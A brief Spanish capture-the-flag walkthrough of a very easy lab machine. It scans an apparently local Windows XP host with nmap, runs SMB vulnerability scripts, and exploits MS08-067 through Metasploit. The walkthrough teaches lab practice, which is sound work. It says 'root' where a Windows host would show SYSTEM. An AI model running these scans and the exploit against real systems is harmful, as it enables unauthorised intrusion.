Experience

🔍 Dificultad: Muy Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.139

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.139 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 135, 139 y 445 pertenecientes a servicios de Microsoft RPC, NetBIOS-SSN y Microsoft-DS están abiertos, por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p135,139,445 -v 192.168.1.139

para obtener más información sobre ese puerto específicamente.

Tenemos un Windows XP. Revisamos el puerto 445.

nmap -p445 --script="smb-vuln-*" 192.168.1.139

🚀 EXPLOTACIÓN

Vamos explotar MS08-067 con Metasploit.

set RHOSTS 192.168.1.139
exploit

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

getuid

aún somos root.

Last updated

Was this helpful?